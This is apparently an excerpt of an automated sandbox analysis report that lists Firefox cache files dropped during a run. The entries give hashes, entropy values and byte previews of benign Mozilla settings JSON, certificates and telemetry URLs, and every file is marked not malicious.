                                                                                                                                                                                  SHA-512:4CA3BB0B25A1AEDD0D5C70810B08292AFB7D7BED8969F2476915812CE7059FD8EE71273C3CB6F91CA72D61EAFF8F4384D83F7AF63E6C3849869B3E26F5CED018
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"signature":{"ref":"17rulcxfyfmye2typue5j0afwb","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"jvmCnaV-W5c0Ffu4qd7mmb0sfSdZnBJQpcd7oBEKQODSbQ3jJ_ttzwzPvvCvUSdD8-2CQb5Z8v2KADBLNw184G2726eiq6ljNVRl5LZTkDCDht7hU47hJr1eNkJk_-Dg","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7gsw2EWoqGzqOXmUVf5aDVfUHQxV8aW4x3H/oT0qGFXgDFHb+t"},"attachment":{"enabled":false,"required":false},"displayFields":["thirdPartyId","overridesId"],"id":"search-default-override-allowlist","last_modified":1708041621125}}C..@..........e...e...F.A.e...........:https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-default-override-allowlist?_expected=1595254618540.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAA

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\E5834CBB5541E887179E64B91A937E3BE71A4E8C

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 1208352768
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12577
                                                                                                                                                                                  Entropy (8bit):6.66216794116053
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:PUYRM87tSjzUcQmzwTWvoglJmzwTWvogrBHJm2OdAnAlCvDxlCvDxT:PUYRh7qbzSWvoI8zSWvoIBHJmvO+
                                                                                                                                                                                  MD5:73AE4E3B28A6EEAE16F0DBDC636939D9
                                                                                                                                                                                  SHA1:94B2DD84A04459E058F76C40E3845C43BAEC478B
                                                                                                                                                                                  SHA-256:0D6018AB0A9CCF609F0E466C694B73EF49340E7EBF04B3934DAE776A4CF14963
                                                                                                                                                                                  SHA-512:836F603C9368B2DB31722A30438E4C6140D6E74129DBD072968133BCC04CA39E8F4090CC6CE08D37F88BD76D1D1860A60967A4F5BFD955FC19E5312938F3AF33
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..........}WmW.J.......-.......[A.VT.....n......ET........~b..>....X..I.Y.....-....qjYa.$........H].....4../..A..<.[x.....^K..e..0.O....D..d:.9[..r..t&0.#..Q.g....Z.d.$....N..s)..SK...T.1......=..f...4..$L.g.^T.M}...U..y..Z |(.4....3.P3D.....5..>...+...k....z..-..MF...{1.u.m[.....W..Ux.:...).;/i...r]...~3/..9^<....E.`4Cd#..)v;8...#D...t........>..Z.yg.@,.2"...........e.aB.0.i...#...5..L;...CN.8.+.sp.Y.E.....zP.Ac.lA.P...M....c...........i.T.V).xe..Lx4..^).Ao}......h..R..p...L].....q._\.-e...C.~...xtEg<..6i..rn..8C......."..T..."......I...&.%ma!.`...N.$...U..M..}.Kj.H....G...r.h......1..B.a.B.v.....^...F#.?.H6...Joi......0.L.5ycK.@....u.Y>..;!n..t.#7Ifq.1..[..9....B...O.......!H2..@.u.......:.......a.A[..k...j.....D~.K.^...ay.Zu.v.R}.......X..VR....uQF.....0M.V?q.O.^.]n.?.r@....u.h.B.....*%...R#.e.)/.g......A....fM.T.6...W...^..}..}c....../.s..ty..n......q.z......~u..Iw=...\j.....,V.l..A!...L.l.....@..-,.$.)=..c..{. ...2F....f../.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\E66F5AA5E3C285C270CF84BD11111C74D38F245C

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:PEM certificate
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12983
                                                                                                                                                                                  Entropy (8bit):6.040529360108778
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:H3vPu9fiGLm4pUOE0M6dtE0M6dwtL2m2B:OBi8mCUOE56dtE56dwcv
                                                                                                                                                                                  MD5:83B93C6C3C7172D0C3C7F2AE1FA0C337
                                                                                                                                                                                  SHA1:CE39D0A6D78AB71762F575110F2DB8215A5C4964
                                                                                                                                                                                  SHA-256:535E00667B73BE8CBF29346C538CC15E46D94E72B899450525550B061B18B5C8
                                                                                                                                                                                  SHA-512:0D9226A64180A1AC62E63D6C1EA854BD868C3247D2B701D90FE1CDF49F07A82BD7EBDAD48AED1AED88DA1D16B32D1380889F54CFB553D6E5678BA7D5DF34C757
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:-----BEGIN CERTIFICATE-----.MIIDBTCCAougAwIBAgIIF7VKXYI9wGUwCgYIKoZIzj0EAwMwgaMxCzAJBgNVBAYT.AlVTMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMS8wLQYDVQQLEyZNb3pp.bGxhIEFNTyBQcm9kdWN0aW9uIFNpZ25pbmcgU2VydmljZTFFMEMGA1UEAww8Q29u.dGVudCBTaWduaW5nIEludGVybWVkaWF0ZS9lbWFpbEFkZHJlc3M9Zm94c2VjQG1v.emlsbGEuY29tMB4XDTI0MDEyMDE0MzYzOVoXDTI0MDQwOTE0MzYzOVowgakxCzAJ.BgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1Nb3VudGFp.biBWaWV3MRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMRcwFQYDVQQLEw5D.bG91ZCBTZXJ2aWNlczE2MDQGA1UEAxMtcmVtb3RlLXNldHRpbmdzLmNvbnRlbnQt.c2lnbmF0dXJlLm1vemlsbGEub3JnMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEwsfT.f5S2a2sekbOGwvfp1fzj+EX015Cbp8qoECAsPf3bIiOUBcpsPNrqE7CwENuT9M56.G330NauFdbZuhlUOBbOWisNkg7ytb5xloJUDSUNPtm+vMLaNp+RQO9COPvWlo4GD.MIGAMA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDAzAfBgNVHSME.GDAWgBSgHUoXT4zCKzVF8WPx2nBwp8744TA4BgNVHREEMTAvgi1yZW1vdGUtc2V0.dGluZ3MuY29udGVudC1zaWduYXR1cmUubW96aWxsYS5vcmcwCgYIKoZIzj0EAwMD.aAAwZQIxALkbKiC7VVovqH1uVcJu148tAltkdzAw7zHe7iqd0PzbYKoDceWJcH

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\E7C910543B69DE5FA294C9C5C8BCBA8D1A76D40D

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 2167799808
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):24355
                                                                                                                                                                                  Entropy (8bit):7.6692750790083295
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:vzpnJCvsIdXvoDX4LZoqltz2oP1fCy+5n07MrnHmzwTWvoglJmzwTWvogrBHJm2D:XidXg74VRz2QgJnfCzSWvoI8zSWvoIBr
                                                                                                                                                                                  MD5:D5D81B5286BF394CCFCFEF40AD8707A2
                                                                                                                                                                                  SHA1:BDBE29FDA500FDA11CACD44B06BF8CDAF6A2A3AE
                                                                                                                                                                                  SHA-256:E55ACB4777C3F69BFD6B715A3514D826A0C2F98A6C86121FAC3B20F6854F8BD6
                                                                                                                                                                                  SHA-512:7F98FC8B515DFF9F8A326A356401484757A619B710E788EA3F3C3B177E94D25F98F625615B4BB1C15CD6526996AD1A8F34464817CB21C2C0EDCDC8B41884A40F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...........}i[.:......_..q.N.M..P.B.t.RZ.......20...5H.<..=.....5kii...D.&.q?.:..y.R.eW....(Jg.tr..%;.~.`....y...h.O....u-..~..7T..h:....>LE`......?jw....IMx..J{,..qR...zR...D.......'..w#.v)...\.uV..P....y&=(e.A..Lz......ao.I..~....E...<3.=...Y...'2v.L.=1Z^.0..T$.J.QU.=..BYH.........C.............MF...u.*....B......Q....A.........G..+N.S/[..pV...n..ia..r.. .kAnWAn...@1.r.......`..N.k....O}?.K..ON........<.W..e.......9.pb.Q*.....+........O........5.w...(.~?.#.t...#h..-..d6.,.n...71.....8........n.l=.......D.@.....K.z>.,...<...4J..[.....V?.<..h.T%........A......&."N .$M...........9$w1...8.S%..\...A..G)..x.M.1,)N......o......Wa...j.>....m1..'..J....!<...6..QO*.).....!..`M....&.A..1......}......At.=.R......4O..e....L..P...%..z...g.z.1..OW.....xy...F.._........< ..p.`..........|A.v.....<f.^.'.x...g.=&.w.29<...rH<.#N.S..g.i.6.`OL....m.\.WX}.6...`u .r'........y,.+..{......^G.a.v.......%n.....`=5..a.L*...RH..>.-9=.....!P.~2}.........Z+....:..w

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\E8D08DAD0FB6E27145709A42880F6C81F3BE873A

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12054
                                                                                                                                                                                  Entropy (8bit):6.021649892576228
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:YKCJy5JIJ6stInknB9JssJ9ZJ9eJHlJ9OJy9aeyheEVGq8BRwtkQpSISkrJAy/Gq:YKCe6IRcj5+TuaaeLYGBRohB1r1uk/KS
                                                                                                                                                                                  MD5:596E1D9066811E9E0EAB7C90B59A3013
                                                                                                                                                                                  SHA1:6E9BEB0B356190BC80D26210C3FD6C4497B62E2B
                                                                                                                                                                                  SHA-256:FA75542B1389AC24D2A39E75D7553126A2195575ABB85FF2AA6C5676923F02E8
                                                                                                                                                                                  SHA-512:B6AE60C5A9EAF019ED0F0EE52F2A3495439F9304BEAA3A03CDFBF39911D128FEC457EF088B841DBF6A599F3A7C05DD3E9314E10596D596EBE0229EA154389BFF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"sort":"-last_modified","schema":{"$id":"http://example.com/example.json","type":"object","title":"The root schema","$schema":"http://json-schema.org/draft-07/schema","default":{},"examples":[{"id":"US","providers":"cloudflare-global, nextdns-global","rolloutEnabled":true,"steeringEnabled":true,"steeringProviders":"comcast-US","autoDefaultEnabled":false,"autoDefaultProviders":""}],"required":["id","rolloutEnabled","steeringEnabled","autoDefaultEnabled"],"properties":{"id":{"$id":"#/properties/id","type":"string","title":"Region ID","default":"","examples":["US"],"description":"An identifier for the region compatible with Region.jsm"},"providers":{"$id":"#/properties/providers","type":"string","title":"Regional providers","default":"","examples":["foo, bar"],"description":"Comma-separated list of provider identifiers, referencing doh-providers collection"},"rolloutEnabled":{"$id":"#/properties/rolloutEnabled","type":"boolean","title":"Enable rollout in this region","default

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\F185413FAD93D94EA0728300525935F70F8C23A7

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8044
                                                                                                                                                                                  Entropy (8bit):6.040764171584436
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:8MdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEckNLUcuNLU3:rWebV2GZuZrFK0k0t7qW0NbZovEpau
                                                                                                                                                                                  MD5:C29B5CDA41D878A9AA19077EC4B54864
                                                                                                                                                                                  SHA1:46A47778DBB47547C39BC03219DDC4D7B3ED301A
                                                                                                                                                                                  SHA-256:503C49101F2139B1A1E061FC013E041F44DD74CE275EBF60F38A3FAD7216CCFB
                                                                                                                                                                                  SHA-512:DA4BE11DAAF3653903FDB63728EB3C4730161B7B3D0EB6BA7E16E69F85FD843C6F8BC753BA9A97FC0E0ADD995800D9D17ECE1111F6E9A1B757EB7EE398FF046D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.@.0........e...e...F.A.e......z....a,~1708514996,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/newtab/1/8940dc38-b85f-4355-b090-8e4e300a9627.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAX1MIIF8TCCA9mgAwIBAgIQAeBji5rfnEKbkKRvGDdhcDANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xKjAoBgNVBAoMIVRoZSBVbml2ZXJzZSBTZWN1cml0eSBDb21wYW55IEx0ZDEqMCgGA1UEAwwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMB4XDTI0MDIyMDExMzA0MVoXDTI1MDIxOTExMzA0MVowgYExCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1TYW4gRnJhbmNpc2NvMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMScwJQYDVQQDEx5pbmNvbWluZy50ZWxlbWV0cnkubW96aWxsYS5vcmcwggEgMA0GCSqGSIb3DQEBAQUAA4IBDQAwggEIAoIBAQC6fSGp+3k/jYV0wKkW3gQZCsFMiAetEX3hSKGyBO522ckT4qIKL2PhqeOVfpasu6OKrBlaTER1jL9E7t7Fe1dm9pM4RfkTRwojdnStBkZhLEAthazf5IuZoKClyIQOBeBlo99E8hszS

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\F22297B1DB859C93D24FA9FDEF39B6321AC2382E

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 771817472
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11243
                                                                                                                                                                                  Entropy (8bit):6.236166493994508
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:asSj8TUN+kYmSmhZwTWvoglqYmSmhZwTWvogrxsMHJm4nOdAna0AxkDCvDXhJ7Cr:bSjuUcHmzwTWvoglJmzwTWvogrBHJm2v
                                                                                                                                                                                  MD5:3E655B04082042DA630D787C291CA9B3
                                                                                                                                                                                  SHA1:30A7F6B78F6A5611C35BB89DF2B6BE271B1294D9
                                                                                                                                                                                  SHA-256:0AE84DDFC9C96F264AAD9252534BA6730DFF67BFFAB4394B5F5ABC2D05C8652D
                                                                                                                                                                                  SHA-512:F9F430878BDFFD9F01662BF74982E26CD751E0B79D99653DB4721164825E921A079ECA5923EEFF22E4FD82378677F013ECF191AA021DBE80BA7118A5D145B405
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..........}..j.0.D.....fs.-....R.K).."6........./vK.(.;.fg..I...|.......*/o.r....Za.M~u{:.....g.d....`...F''....0..K.i.b..Ri.&ai.q"a..3N.B).3.Y....UE.d.0G.s5b.0C...%..........,4.w..3..}.J..1.AV7.;.....A....o.....R......*...$.k_D.%<.{V..iE.'Q.W;...Yv...K.zdh.Id.e...q2.$..m+....|.c.......nv...........e...e...F.A.g.H.........O^partitionKey=%28https%2Cgoogle.com%29,:https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.QKwFb1UtQb4.es5.O/ck=boq-identity.AccountsSignInUi.D0FJR7J34cc.L.F4.O/am=P2CJhmMBEJhZTvP3jJPDAAAAAAAAAAAAawA7/d=1/exm=A7fCU,AvtSve,Ctsu,EFQ78c,EGw7Od,EN3i8d,I6YDgd,IZ1fbc,IZT63,K0PMbc,KUM7Z,L1AAkb,LDQI,LEikZe,MpJwZc,NOeYWe,NTMZac,O6y8ed,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,Rusgnf,SCuOPb,STuCOe,SpsfSb,UPKV3d,UUJqVe,Uas9Hd,VwDzFe,W2YXuc,YHI3We,YTxL4,ZUKRxc,ZZ4WUe,ZwDk9d,_b,_tp,aW3pY,b3kMqb,bPkrc,bSspM,bTi8wc,bm51tf,byfTOb,eVCnO,fFzhe,fJpY1b,fqEYIb,hc6Ubd,hmHrle,iAskyc,inNHtf,kSPLL,lsjVmc,ltDFwf,lwddkf,mWLH9d,my67ye,n73qwf,njlZCf,oL

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\F3E771A3681C26E693BDBFEFFA9FC28B401203B2

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8044
                                                                                                                                                                                  Entropy (8bit):6.040420210563875
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:elMdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEckcLUcucLc:eOWebV2GZuZrFK0k0t7qW0NbZovEpR7
                                                                                                                                                                                  MD5:2C93966D758DC586F0AB723830B90376
                                                                                                                                                                                  SHA1:6600F536CE3BDF9C2A512B84CC68AFEDA70FF505
                                                                                                                                                                                  SHA-256:60971F65D536A5F52BF839A0E2D87C7AFC147D3D18ABCFA97699B58211564A30
                                                                                                                                                                                  SHA-512:2E8FFA6E3DD9E096338141940B247C8F56C0C320ABE0C93E4775ED1C74DB01D373A059C19F5F2D34DC18D9958F1F75B155CFFBC13252BEADD1FD5D6BFDCA0BED
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.../........e...e...F.A.e......z....a,~1708514998,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/newtab/1/6f7581f3-9c81-406e-b1d2-b9090ab44db1.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAX1MIIF8TCCA9mgAwIBAgIQAeBji5rfnEKbkKRvGDdhcDANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xKjAoBgNVBAoMIVRoZSBVbml2ZXJzZSBTZWN1cml0eSBDb21wYW55IEx0ZDEqMCgGA1UEAwwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMB4XDTI0MDIyMDExMzA0MVoXDTI1MDIxOTExMzA0MVowgYExCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1TYW4gRnJhbmNpc2NvMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMScwJQYDVQQDEx5pbmNvbWluZy50ZWxlbWV0cnkubW96aWxsYS5vcmcwggEgMA0GCSqGSIb3DQEBAQUAA4IBDQAwggEIAoIBAQC6fSGp+3k/jYV0wKkW3gQZCsFMiAetEX3hSKGyBO522ckT4qIKL2PhqeOVfpasu6OKrBlaTER1jL9E7t7Fe1dm9pM4RfkTRwojdnStBkZhLEAthazf5IuZoKClyIQOBeBlo99E8hszS

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\F5783AC23BCCE599907235DCB3EDF8D0F5801342

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 922812416
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11252
                                                                                                                                                                                  Entropy (8bit):6.243282877152761
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:L1McbRSj8TUNGzkYmSmhZwTWvoglqYmSmhZwTWvogrxsMHJm4nOdAna0Axk0CvDj:LO0SjuUcHmzwTWvoglJmzwTWvogrBHJh
                                                                                                                                                                                  MD5:CB71812E04E27C0E0ABC23E254BA5CA2
                                                                                                                                                                                  SHA1:6A3AF6B08130C8BFDB0574D74065739905447CF5
                                                                                                                                                                                  SHA-256:63FB097F925E1F5BEE367EA0E1DDE4DF8BA6114B438396D9233D19F200556516
                                                                                                                                                                                  SHA-512:AB6411B5F054CAA70FF3BD3CE3C50C36DDA1D3CC8D3CF43F56570F1C6554E14E9FD3825B3B0DB136176588FA13B767B32B631B7C68C1D94292F2F6DF6B59FC8F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..........}..j.0...z...fs.-.....K).."....:....w/rK.(.&.;...]...7..).e..Zo....)e;...jk.y....q..n:.|e..l..&.Wfm........p'0.....z.+.f......D...q..N.'(.A....5........9...<..aF..$..w...C...k...P.....!.6.Xo}.4.sA..._..ay....p=>..-=.g.x.E..f.l...+B...q...c..2N.B.J.cR9.vn.......Y...`.L&...m..a..o>xfG.................e...e...F.B.g.j.........O^partitionKey=%28https%2Cgoogle.com%29,:https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_US.J6zlSvuPGsg.es5.O/ck=boq-identity.AccountsSignInUi.RCgm07LyQic.L.F4.O/am=P2CJlmMBEISZlnP-nnFyGAAAAAAAAAAArAHs/d=1/exm=A7fCU,AvtSve,Ctsu,EFQ78c,EGw7Od,EN3i8d,I6YDgd,IZ1fbc,IZT63,K0PMbc,KUM7Z,L1AAkb,LDQI,LEikZe,MpJwZc,NOeYWe,NTMZac,O6y8ed,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,Rusgnf,SCuOPb,STuCOe,SpsfSb,UPKV3d,UUJqVe,Uas9Hd,VwDzFe,W2YXuc,YHI3We,YTxL4,ZUKRxc,ZZ4WUe,ZwDk9d,_b,_tp,aW3pY,b3kMqb,bPkrc,bSspM,bTi8wc,bm51tf,byfTOb,eVCnO,fFzhe,fJpY1b,fqEYIb,hc6Ubd,hmHrle,iAskyc,inNHtf,kSPLL,lsjVmc,ltDFwf,lwddkf,mWLH9d,my67ye,n73qwf,

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\F70837499B890A8D3B5C5907DA600AE3DEF49903

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9760
                                                                                                                                                                                  Entropy (8bit):6.113552406447489
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:dDMwBNPcpFR8SeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdGPXdGPe:dAWOeLYGBRohB1r1uk/KiFTaIdaGX
                                                                                                                                                                                  MD5:FC1B0D54F72928B1725AD7ADBF168B8D
                                                                                                                                                                                  SHA1:76CF1D1B55A2175E6DB6A0B6757AE2771BDA8A79
                                                                                                                                                                                  SHA-256:CB17DA0F107141C21BA179F771FB776C2FB0620334481AE527D166898FC39225
                                                                                                                                                                                  SHA-512:8B230CCB7C2A7838988F6E7AF877F5D3056EF2C24561B2BD7537FFEA1943BDCB5C2F4E7C5E18DF6BD4D6F4B98C59A2B40796033723E8EDD2B6E79B3A8431F38D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"sort":"-last_modified","schema":{"type":"object","required":["name","release","revision","license"],"properties":{"id":{"type":"string"},"name":{"type":"string","title":"Name","description":"The name of the project, e.g. bergamot-translator"},"license":{"type":"string","title":"License","description":"The license of the wasm, as a https://spdx.org/licenses/"},"release":{"type":"string","title":"Release","description":"The human readable identifier for the release. e.g. v0.4.4"},"revision":{"type":"string","title":"Revision","description":"The commit hash for the project that generated the wasm."}}},"signature":{"ref":"3at5mbgf5mqwf24mrmz042ti7m","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"1Pi8xGXAsMvLuO7UKugWW97kiqikykcWXBpsk_OypNCwN1ZvMjkE_SDnmOWcPlFWPeV_H0bquFzJrzXTu-vtAHtcH6YQCktkbqDHxS6zmCN6MeiPrhPZ7uFPHv2EsFGM","signer_id

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\F8CBD54DDA10F4286A41EC6A537240712D6C2308

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8559
                                                                                                                                                                                  Entropy (8bit):6.096215849886045
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:QNuoeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdUtdU8:QNuoeLYGBRohB1r1uk/KiFTaIdaOf
                                                                                                                                                                                  MD5:A4202F3AE8B916989D843AE3D806989E
                                                                                                                                                                                  SHA1:FB130000DC42AE9397B3B0CC5DF195F1255194F9
                                                                                                                                                                                  SHA-256:0B61A645009DA02B5920C1886F749723B9152779788E39E01640FB72AC37E0DD
                                                                                                                                                                                  SHA-512:53485E081605AB1AFE3FBCA32F8ACD51E2F21A3DEA7F2495D69CDBEBD140460421AA000920D3CE7B994BCD76EC123C868C5AE305416C70B7FE85B56D142400F8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"project_name":"Remote Settings PROD","project_version":"18.0.0","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"batch_max_requests":25,"readonly":true,"explicit_permissions":false},"capabilities":{"changes":{"description":"Track modifications of records in Kinto and store the collection timestamps into a specific bucket and collection.","url":"http://kinto.readthedocs.io/en/latest/tutorials/synchronisation.html#polling-for-remote-changes","version":"32.0.3","collections":["/buckets/blocklists","/buckets/blocklists-preview","/buckets/main","/buckets/main-preview","/buckets/security-state","/buckets/security-state-preview"]},"attachments":{"description":"Add file attachments to records","url":"https://github.com/Kinto/kinto-attachment/","version":"6.4.0","base_url":"https://firefox-settings-attachments.cdn.mozilla.net/"}}}|..3.............e...F.A.e..[...2....:https://firefox.settin

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\F912C24FABA9BF4E0BFF1501313B27D6222AF622

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8054
                                                                                                                                                                                  Entropy (8bit):6.038985035887847
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:9MdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEck/LUcu/LU3:GWebV2GZuZrFK0k0t7qW0NbZovEpkA
                                                                                                                                                                                  MD5:BA35911B555EAEB7D854D3905FAC5B76
                                                                                                                                                                                  SHA1:E0334E373914FCF3C7CFA110EAEF979957B99235
                                                                                                                                                                                  SHA-256:B2DD2BCE7725193172294647FA3C671AB22BC7D5B3687828C111A1468C9A34B9
                                                                                                                                                                                  SHA-512:96B6C0D34286D500AFEFB5C24AC2C23A26A57C4775F2A6390AD682B1287C636387DD37944B6E440E2C046774A7548754389D0B849D64531A9E2CD2CC3A27BB9A
                                                                                                                                                                                  Malicious:false
